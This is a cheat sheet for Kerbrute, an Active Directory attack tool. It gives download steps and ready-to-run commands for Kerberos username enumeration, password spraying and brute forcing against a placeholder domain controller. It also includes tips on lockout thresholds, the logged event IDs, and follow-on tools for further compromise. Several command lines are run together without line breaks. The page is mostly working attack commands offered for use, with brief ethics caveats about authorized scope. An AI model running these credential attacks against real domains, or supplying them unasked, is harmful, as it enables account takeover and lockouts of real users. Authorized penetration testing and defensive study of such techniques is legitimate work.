Kerbrute Cheat Sheet
Fast Kerberos user enumeration and password spraying without LDAP.
Overview
Kerbrute abuses Kerberos pre-authentication to validate usernames and passwords against a domain controller—often without triggering standard LDAP lockouts on some configurations (still can lock accounts). Ethics: password spraying and user enumeration are active attacks; use only on domains in authorized scope with agreed spray policies.
Install
Release binary from GitHub (authorized use)
wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64chmod +x kerbrute_linux_amd64./kerbrute_linux_amd64Essential commands
./kerbrute_linux_amd64 userenum -d corp.local --dc 10.10.10.1 users.txt./kerbrute_linux_amd64 passwordspray -d corp.local --dc 10.10.10.1 users.txt 'Password1!'./kerbrute_linux_amd64 bruteuser -d corp.local --dc 10.10.10.1 j.doe passwords.txtCommon workflows
User enumeration —
./kerbrute userenum -d corp.local --dc 10.10.10.1 /usr/share/seclists/Usernames/xato-net-10k-usernames.txt -o valid_users.txtPassword spray (one password, many users) —
./kerbrute passwordspray -d corp.local --dc 10.10.10.1 valid_users.txt 'Spring2026!'Single-user brute force (small list) —
./kerbrute bruteuser -d corp.local --dc 10.10.10.1 administrator passwords.txtThreading and delay —
./kerbrute passwordspray -d corp.local --dc 10.10.10.1 users.txt 'Pass' --threads 10Flags reference
userenum | Valid usernames via Kerberos |
|---|---|
passwordspray | One password, many users |
bruteuser | One user, many passwords |
-d | Domain FQDN |
--dc | Domain controller IP |
-o | Output file |
--threads | Concurrency |
Tips
- Ethics: one password per spray window; align with domain lockout threshold (often 5 in 30 min).
- Kerberos userenum is quieter than LDAP anonymous bind on modern domains but still logged (4768/4771).
- Valid users feed impacket-GetNPUsers, bloodhound, and nxc workflows.
- Combine with enum4linux-ng / ldapdomaindump for full picture.